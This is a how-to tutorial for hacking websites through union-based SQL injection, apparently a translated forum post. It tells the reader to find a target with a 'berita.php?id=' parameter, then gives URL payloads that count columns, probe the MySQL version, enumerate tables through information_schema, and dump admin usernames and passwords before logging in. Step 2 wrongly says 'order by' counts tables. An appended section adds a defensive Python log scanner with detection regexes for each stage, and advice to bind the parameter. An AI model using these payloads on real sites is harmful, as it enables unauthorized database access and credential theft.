How to Hack a Website With SQL Injection Techniques

Understanding SQL Injection

SQL injection is a hacking action carried out on the client application by modifying the SQL commands held in the client application's memory. It is also a technique for exploiting web applications that use a database to store their data.

What you need to know before doing SQL injection in MySQL:
characters: ' or -
comments: /* or --
information_schema: for MySQL version 5.x; not supported in MySQL version 4.x

[Step 1]
Look for a target.
For example: [site]/berita.php?id=100
Add the character ' at the end of the URL, or add the character "-", to see whether an error message appears.
Example:
[site]/berita.php?id=100' or
[site]/berita.php?id=-100
An error message like the following should appear: [many more]

[Step 2]
Find and count the number of tables that exist in the database.
Use the command: order by
Example:
[site]/berita.php?id=-100+order+by+1-- or
[site]/berita.php?id=-100+order+by+1/*
Check step by step (one at a time).
For example:
[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--
Continue until an error appears or the error message disappears.
For example: [site]/berita.php?id=-100+order+by+9--
This means the number we take is 8,
which gives [site]/berita.php?id=-100+order+by+8--

[Step 3]
To bring out the numbers that appear, use union.
Because the error occurred at 9,
then: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
Suppose the number that comes out is 5.
Use version() or @@version to check the SQL version in use; put that command in place of the number that came out earlier.
E.g.: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- or
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
Look at the version in use. If it is version 4, leave it alone, because in version 4 we have to guess the tables and columns on the site ourselves, since the command +from+information_schema cannot be used.
For version 5 you are lucky: there is no need to guess the tables and columns as in version 4, because version 5 can use the command +from+information_schema.

[Step 4]
To display the tables on the site:
command table_name >>> put in place of the number that came out earlier
command +from+information_schema.tables/* >>> inserted after the last digit
Code:
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
Suppose the table that appears is "admin".

[Step 5]
To display all the contents of the table:
command group_concat(table_name) >>> put in place of the number that came out earlier
command +from+information_schema.tables+where+table_schema=database() >>> inserted after the last digit
[Step 6]
command group_concat(column_name) >>> put in place of the number that came out earlier
command +from+information_schema.columns+where+table_name=0xhexa-- >>> inserted after the last digit
At this stage you must convert the word taken from the table contents to hexadecimal.
Website used for the conversion:
http://www.v3n0m.net/ascii.htm
For example, if the word you want to convert is admin, it becomes 61646D696E.
[Step 7]
Display what was obtained from the table earlier, as follows:
command concat_ws(0x3a,result of the column contents to be output) >>> put in place of the number that came out earlier
command +from+(name of the table obtained) >>> inserted after the last digit
Example:
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,result column contents),6,7,8+from+(name of the table obtained)--
For example, the words that came out are id, username, password.
Example:
[Step 8]
The last stage is the admin or login page.
OK, thanks, finished.
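
Seen from the server side, the requests in steps 1 to 7 leave a recognisable progression in the access log. The following is an added example, not part of the original post: a small log scanner whose rule names, sample log lines and IP addresses are all constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Hypothetical rule names, one per request shape described in steps 1-7.
# Patterns run on the URL-decoded, lowercased query string.
STAGES = [
    ("quote_probe",    re.compile(r"=-?\d+'")),
    ("order_by_count", re.compile(r"\border\s+by\s+\d+")),
    ("union_select",   re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("version_probe",  re.compile(r"@@version|\bversion\s*\(")),
    ("schema_enum",    re.compile(r"\binformation_schema\.(tables|columns)\b")),
    ("concat_dump",    re.compile(r"\b(group_concat|concat_ws)\s*\(")),
    ("hex_literal",    re.compile(r"\b0x[0-9a-f]{2,}\b")),
]
# Client address and request target from a combined-format access log line.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(request_target):
    """Return the stage names whose pattern matches the query string."""
    _, _, query = request_target.partition("?")
    decoded = unquote_plus(query).lower()  # '+' and %xx decoded as the server would
    return [name for name, rx in STAGES if rx.search(decoded)]

def scan(lines, min_stages=2):
    """Collect stages per client; report clients showing at least min_stages."""
    seen = defaultdict(set)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            seen[m.group(1)].update(classify(m.group(2)))
    return {ip: sorted(s) for ip, s in seen.items() if len(s) >= min_stages}

# Constructed sample log lines (documentation IP ranges, invented timestamps).
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /berita.php?id=100 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /berita.php?id=100%27 HTTP/1.1" 200 310',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /berita.php?id=-100+order+by+9-- HTTP/1.1" 200 310',
    '203.0.113.9 - - [01/Jan/2024:10:00:14 +0000] "GET /berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- HTTP/1.1" 200 4980',
    '203.0.113.9 - - [01/Jan/2024:10:00:20 +0000] "GET /berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()-- HTTP/1.1" 200 5230',
    '198.51.100.7 - - [01/Jan/2024:10:00:31 +0000] "GET /berita.php?id=101 HTTP/1.1" 200 5098',
]

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE).items():
        print(ip, "->", ", ".join(stages))
```

Log matching of this kind only sees parameters carried in the URL. The underlying fix is for berita.php to accept id only as an integer and pass it to the database as a bound query parameter.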